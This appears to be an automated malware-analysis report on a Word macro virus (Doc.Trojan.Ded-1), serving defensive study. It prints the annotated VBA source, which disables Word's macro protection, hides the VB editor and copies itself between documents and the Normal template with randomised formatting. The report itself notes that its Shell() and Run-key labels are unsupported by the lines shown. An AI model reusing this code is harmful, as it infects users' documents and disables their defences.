MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
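The sample is a malicious Word document containing VBA macros. When the document is closed, the macros attempt to disable Word's macro virus protection (`Options.VirusProtection = False`), hide the Visual Basic editor, and inject their own code into the active document or the Normal template, likely to establish persistence or download additional malware. In the script preview below, the injection is a line-by-line copy between `NormalTemplate` and `ActiveDocument`. Each copied line passes through a routine that randomly inserts line continuations, leading padding, or a random numeric comment, so the macro text (and any hash of it) differs from one copy to the next. The Normal-template write seen in the preview is the behaviour ATT&CK describes under T1137.001 (Office Template Macros); nothing in the previewed lines touches registry Run keys or the Startup folder. The `Shell()` calls reported by the heuristics do not appear in the portion of the script shown before the preview is truncated. The presence of `Shell()` calls and the ClamAV detection signature 'Doc.Trojan.Ded-1' strongly indicate malicious intent.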
Heuristics 3
-
ClamAV: Doc.Trojan.Ded-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Ded-1
-
VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS | Document contains VBA macro code
-
Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21373 bytes |

SHA-256: 6345aea0e326ff847428dd8059c49b8017771134a47a8dd8b4c8e092a7e3a859
Detection
ClamAV:
Doc.Trojan.Ded-1
Obfuscation or payload:
unlikely
|
|||
Preview script: first 1,000 lines of the extracted script
' [analyst] Module header as exported by the extractor. The code that follows belongs
' to the module named "ThisDocument" (VB_Name), whose VB_Base is "1Normal.ThisDocument".
' Lines prefixed "[analyst]" are review annotations and are not part of the sample.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst] Document_New handler with an empty body: it executes no statements.
Private Sub _
Document_New()
End Sub
'9.637774
' [analyst] Document_Close: entry point of the visible macro code. Word raises this
' event handler when the document is closed. It switches off the macro-virus
' protection option, then calls the two copy routines SWL and ABS99.
' The bare numeric comments ('33.61163 etc.) carry no meaning; they match the
' random "'" & (100 * Rnd) suffix produced by function e further down.
Private _
Sub Document_Close()
' [analyst] Any runtime error in this Sub or in the routines it calls jumps to the
' label skam, which falls straight through to End Sub, so failures are silent.
On _
Error GoTo skam
' [analyst] Defence tampering: clears Word's VirusProtection option (the macro warning
' prompt in the Word versions that honour this property).
Options. _
VirusProtection = False
' [analyst] SWL copies code from the Normal template into the active document.
SWL
'33.61163
' [analyst] ABS99 copies code from the active document into the Normal template.
ABS99
'42.56033
skam:
'8.957314
End Sub
'72.16117
' [analyst] SWL: copies the macro code held in the Normal template's first VBComponent
' into the active document's first VBComponent, then saves the document.
' Direction: NormalTemplate -> ActiveDocument (spread to each document that is closed).
' NOTE(review): access to VBProject is normally refused unless "Trust access to the VBA
' project object model" is enabled; the resulting error would be swallowed by the
' caller's On Error handler - confirm against the target Office configuration.
Private Sub SWL()
'42.59714
' [analyst] Closes or hides the Visual Basic editor window so the copy is not visible.
Application. _
ShowVisualBasicEditor = False
' [analyst] Marker check: Find searches line 1, column 1 through line 1000, column 1000
' of the active document's module for the text "Document_Close". The copy only runs
' when that text is absent, i.e. when the document does not already carry the handler.
If Not _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
' [analyst] Walk every line of the Normal template's first code module.
For _
I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
d = NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Lines(I, 1)
' [analyst] Skip empty lines, lone spaces or continuations, and lines whose first
' character is "'" (comments), so the random comments of the previous copy are dropped.
If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
' [analyst] Re-join a statement split over several lines: while the text ends in " _",
' strip the trailing underscore and append the next source line. This advances the
' For counter I inside the loop body.
While Mid(d, _
Len(d) - 1, 2) = " _"
I _
= I + 1
d = Left(d, Len(d) _
- 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
Wend
'95.43525
' [analyst] e() rewrites the joined statement with random continuations, padding or a
' random comment, so each copy has a different textual layout.
d = _
e(d)
' [analyst] Write the rewritten statement into the active document's module at line I * 2.
ActiveDocument. _
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
End If
'90.69127
Next I
'36.27004
' [analyst] Persist the modified document; AddToRecentFiles:=False keeps the save out
' of the recent-files list.
ActiveDocument. _
SaveAs AddToRecentFiles:=False
End If
'87.02004
End Sub
'90.91909
' [analyst] ABS99: mirror image of SWL. Copies the macro code held in the active
' document's first VBComponent into the Normal template's first VBComponent, then saves
' the template. Direction: ActiveDocument -> NormalTemplate.
' Detection note: the NormalTemplate.Save call below writes the global template file to
' disk, which is a file modification defenders can monitor for.
Private Sub _
ABS99()
' [analyst] Marker check: only proceed when the Normal template's module does not
' already contain the text "Document_Close" (searched from line 1 to line 1000).
If Not NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
' [analyst] f is called with the template's full path. f is not defined in the visible
' part of the listing, so its effect cannot be stated from here - TODO confirm against
' the full macros.bas.
f (NormalTemplate. _
FullName)
' [analyst] Walk every line of the active document's first code module.
For I = _
1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
d = ActiveDocument.VBProject. _
VBComponents(1).CodeModule.Lines(I, 1)
' [analyst] Skip empty lines, lone spaces or continuations, and comment lines.
If Len(d) _
> 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
' [analyst] Re-join continued lines: while the text ends in " _", strip the underscore
' and append the next source line (advances the For counter I).
While _
Mid(d, Len(d) - 1, 2) = " _"
I = _
I + 1
d = Left(d, _
Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
Wend
'95.04152
' [analyst] e() re-randomises the statement's layout before it is written out.
d _
= e(d)
' [analyst] Write the rewritten statement into the Normal template's module at line I * 2.
NormalTemplate.VBProject. _
VBComponents(1).CodeModule.InsertLines I * 2, d
End If
'29.928
Next I
'63.33987
' [analyst] Persist the modified Normal template.
NormalTemplate. _
Save
End If
'4.384488
End Sub
'4.367179
Private Function _
e(aString) As String
aString _
= LTrim(aString)
aString = RTrim(aString)
'62.57433
If aString = "Sub " & "Vc()" Then
'53.55306
aString _
= "Sub " & "ViewVBCode()"
Else
'98.58498
If aString = "Sub " & "ViewVBCode()" Then
'60.07596
aString _
= "Sub " & "Vc()"
End If
'61.56798
End _
If
For _
I = 1 To Len(aString) - 1
If _
Mid(aString, I, 1) = "." Then
If Not _
Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then
If Not Mid(aString, I + 1, 1) _
= Chr$(34) Then
e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)
For _
j = 1 To Int(15 * Rnd)
e = " " & e
'57.74265
Next j
'78.44582
Exit _
Function
End If
'30.3376
End If
'26.83433
Else
'31.48093
If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then
If _
Not Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then
e = Left(aString, I - 1) & " _" & _
Chr$(13) & Right(aString, Len(aString) - I)
For _
j = 1 To Int(15 * Rnd)
e = " " & e
'10.19003
Next j
'56.59349
Exit _
Function
End _
If
End _
If
End _
If
Next I
'45.99786
e = _
aString & Chr$(13) & "'" & (100 * Rnd)
Count
... (truncated)